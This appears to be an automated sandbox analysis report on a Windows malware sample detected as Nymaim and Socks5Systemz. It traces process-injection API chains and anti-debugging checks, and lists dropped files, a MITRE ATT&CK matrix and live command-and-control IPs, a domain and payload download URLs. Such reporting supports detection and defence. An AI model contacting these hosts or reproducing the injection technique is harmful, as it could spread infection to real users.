            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00630042 push dword ptr fs:[00000030h]0_2_00630042
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E4648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,6_2_02E4648B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405090 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00405090
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004080BA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004080BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040824A SetUnhandledExceptionFilter,0_2_0040824A
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407750 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00407750
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E59528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_02E59528
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Contains functionality to inject code into remote processes
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00630110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_00630110
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00477F98 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,3_2_00477F98
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause alter_game_11196Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0042E094 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,3_2_0042E094
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063AC0C cpuid 0_2_0063AC0C
            Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0040FEBB
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: GetLocaleInfoA,2_2_004051FC
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: GetLocaleInfoA,2_2_00405248
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: GetLocaleInfoA,3_2_00408558
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: GetLocaleInfoA,3_2_004085A4
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeQueries volume information: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004583E8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,3_2_004583E8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408FA6 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00408FA6
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00455570 GetUserNameA,3_2_00455570
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404250 SetFileAttributesW,GetCommConfig,EnumCalendarInfoW,GetLogicalDriveStringsA,SetComputerNameA,ChangeTimerQueueTimer,GetTempFileNameW,EnumTimeFormatsA,WriteConsoleInputW,GetVersionExA,InterlockedIncrement,GlobalUnWire,0_2_00404250

            Stealing of Sensitive Information

            barindex
            Yara detected Nymaim
            Source: Yara matchFile source: 0.2.file.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Yara detected Socks5Systemz
            Source: Yara matchFile source: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3048714500.0000000002D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: altergame32.exe PID: 2488, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Socks5Systemz
            Source: Yara matchFile source: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3048714500.0000000002D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: altergame32.exe PID: 2488, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,6_2_609660FA
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,6_2_6090C1D6
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,6_2_60963143
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,6_2_6096A2BD
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,6_2_6096923E
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,6_2_6096A38C
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,6_2_6096748C
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,6_2_609254B1
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,6_2_6094B407
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6090F435 sqlite3_bind_parameter_index,6_2_6090F435
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,6_2_609255D4
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609255FF sqlite3_bind_text,6_2_609255FF
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,6_2_6096A5EE
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,6_2_6094B54C
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,6_2_60925686
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,6_2_6094A6C5
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,6_2_609256E5
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,6_2_6094B6ED
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6092562A sqlite3_bind_blob,6_2_6092562A
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,6_2_60925655
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,6_2_6094C64A
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,6_2_609687A7
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,6_2_6095F7F7
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,6_2_6092570B
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,6_2_6095F772
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,6_2_60925778
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6090577D sqlite3_bind_parameter_name,6_2_6090577D
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,6_2_6094B764
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6090576B sqlite3_bind_parameter_count,6_2_6090576B
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,6_2_6094A894
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,6_2_6095F883
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,6_2_6094C8C2
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,6_2_6096281E
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,6_2_6096583A
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,6_2_6095F9AD
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,6_2_6094A92B
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6090EAE5 sqlite3_transfer_bindings,6_2_6090EAE5
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,6_2_6095FB98
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,6_2_6095ECA6
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,6_2_6095FCCE
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,6_2_6095FDAE
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,6_2_60966DF1
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,6_2_60969D75
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,6_2_6095FFB2

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            Input Capture            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		12
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		2
            Windows Service            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory1
            Account Discovery            		Remote Desktop Protocol1
            Input Capture            		2
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Bootkit            		1
            Access Token Manipulation            		3
            Obfuscated Files or Information            		Security Account Manager3
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Windows Service            		21
            Software Packing            		NTDS45
            System Information Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
            Process Injection            		1
            Timestomp            		LSA Secrets251
            Security Software Discovery            		SSHKeylogging122
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials141
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Masquerading            		DCSync2
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
            Virtualization/Sandbox Evasion            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Access Token Manipulation            		/etc/passwd and /etc/shadow3
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
            Process Injection            		Network Sniffing1
            Remote System Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Bootkit            		Input Capture1
            System Network Configuration Discovery            		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1559044 Sample: file.exe Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 64 Suricata IDS alerts for network traffic 2->64 66 Found malware configuration 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 15 other signatures 2->70 10 file.exe 2->10         started        process3 signatures4 74 Contains functionality to inject code into remote processes 10->74 76 Injects a PE file into a foreign processes 10->76 13 file.exe 22 10->13         started        process5 dnsIp6 62 185.156.72.65, 49730, 49731, 80 ITDELUXE-ASRU Russian Federation 13->62 50 C:\Users\user\AppData\...\ebAAb6KfuCx7.exe, PE32 13->50 dropped 52 C:\Users\user\AppData\...52qISs1vOr.exe, PE32 13->52 dropped 54 C:\Users\user\AppData\Local\...\ONE[1].file, PE32 13->54 dropped 56 C:\Users\user\AppData\Local\...\PAB1[1].file, PE32 13->56 dropped 17 NqISs1vOr.exe 2 13->17         started        20 ebAAb6KfuCx7.exe 1 13->20         started        file7 process8 file9 36 C:\Users\user\AppData\Local\...36qISs1vOr.tmp, PE32 17->36 dropped 23 NqISs1vOr.tmp 18 18 17->23         started        72 Multi AV Scanner detection for dropped file 20->72 signatures10 process11 file12 38 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 23->38 dropped 40 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 23->40 dropped 42 C:\Users\user\AppData\...\unins000.exe (copy), PE32 23->42 dropped 44 17 other files (10 malicious) 23->44 dropped 26 altergame32.exe 1 20 23->26         started        30 net.exe 1 23->30         started        process13 dnsIp14 58 boietuj.com 185.208.158.202, 49858, 49885, 49892 SIMPLECARRER2IT Switzerland 26->58 60 89.105.201.183, 2023, 49864, 49891 NOVOSERVE-ASNL Netherlands 26->60 46 C:\ProgramDataShineEncoder\sqlite3.dll, PE32 26->46 dropped 48 C:\ProgramData\...ShineEncoder.exe, PE32 26->48 dropped 32 conhost.exe 30->32         started        34 net1.exe 1 30->34         started        file15 process16

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            file.exe37%ReversingLabs
            file.exe40%VirustotalBrowse
            file.exe100%AviraHEUR/AGEN.1306956
            file.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PAB1[1].file100%AviraPUA/Agent.EI
            C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe100%Joe Sandbox ML
            C:\ProgramData\EShineEncoder\EShineEncoder.exe100%Joe Sandbox ML
            C:\ProgramData\EShineEncoder\sqlite3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\AlterGame 1.13\LTDIS13n.dll (copy)0%ReversingLabs
            C:\Users\user\AppData\Local\AlterGame 1.13\bjpeg23.dll (copy)0%ReversingLabs
            C:\Users\user\AppData\Local\AlterGame 1.13\gdiplus.dll (copy)0%ReversingLabs
            C:\Users\user\AppData\Local\AlterGame 1.13\is-28G11.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\AlterGame 1.13\is-GSS65.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\AlterGame 1.13\is-HKUEM.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\AlterGame 1.13\is-NKP4B.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\AlterGame 1.13\is-PR9GR.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\AlterGame 1.13\is-QDBOH.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\AlterGame 1.13\is-T3HEM.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\AlterGame 1.13\ltkrn13n.dll (copy)0%ReversingLabs
            C:\Users\user\AppData\Local\AlterGame 1.13\msvcp71.dll (copy)0%ReversingLabs
            C:\Users\user\AppData\Local\AlterGame 1.13\msvcr71.dll (copy)0%ReversingLabs
            C:\Users\user\AppData\Local\AlterGame 1.13\sqlite3.dll (copy)0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PAB1[1].file54%ReversingLabsWin32.Trojan.PLoader
            C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_iscrypt.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_setup64.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_shfoldr.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp3%ReversingLabs
            C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe54%ReversingLabsWin32.Trojan.PLoader

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://185.208.158.202/s0%Avira URL Cloudsafe
            http://185.208.158.202/search/?q~w0%Avira URL Cloudsafe
            boietuj.com0%Avira URL Cloudsafe
            http://www.freecommander.com/fchelpxe/de/FreeCommander.html0%Avira URL Cloudsafe
            http://freecommander.com/chm/FreeCommanderXE_chm_en.zip0%Avira URL Cloudsafe
            http://freecommander.com/chm/FreeCommanderXE_chm_de.zip0%Avira URL Cloudsafe
            http://freecommander.com/en/downloads/0%Avira URL Cloudsafe
            http://185.156.72.65/add?substr=mixeleven&s=three&sub=nosub100%Avira URL Cloudmalware
            http://185.208.158.202/s2%VirustotalBrowse
            http://boietuj.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31df92d8838ed12a666d307eca743ec4c2b07b529669238658ef814c4ef900%Avira URL Cloudsafe
            http://185.156.72.65/dll/download0%Avira URL Cloudsafe
            http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec9580%Avira URL Cloudsafe
            http://185.156.72.65/dll/key0%Avira URL Cloudsafe
            http://www.freecommander.com/fchelpxe/en/FreeCommander.html0%Avira URL Cloudsafe
            http://boietuj.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a0%Avira URL Cloudsafe
            https://www.easycutstudio.com/support.html0%Avira URL Cloudsafe
            http://185.156.72.65/files/download100%Avira URL Cloudmalware
            http://www.forum.freecommander.com/viewtopic.php?f=6&t=7750%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            boietuj.com
            		185.208.158.202
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              boietuj.comtrue
              • Avira URL Cloud: safe
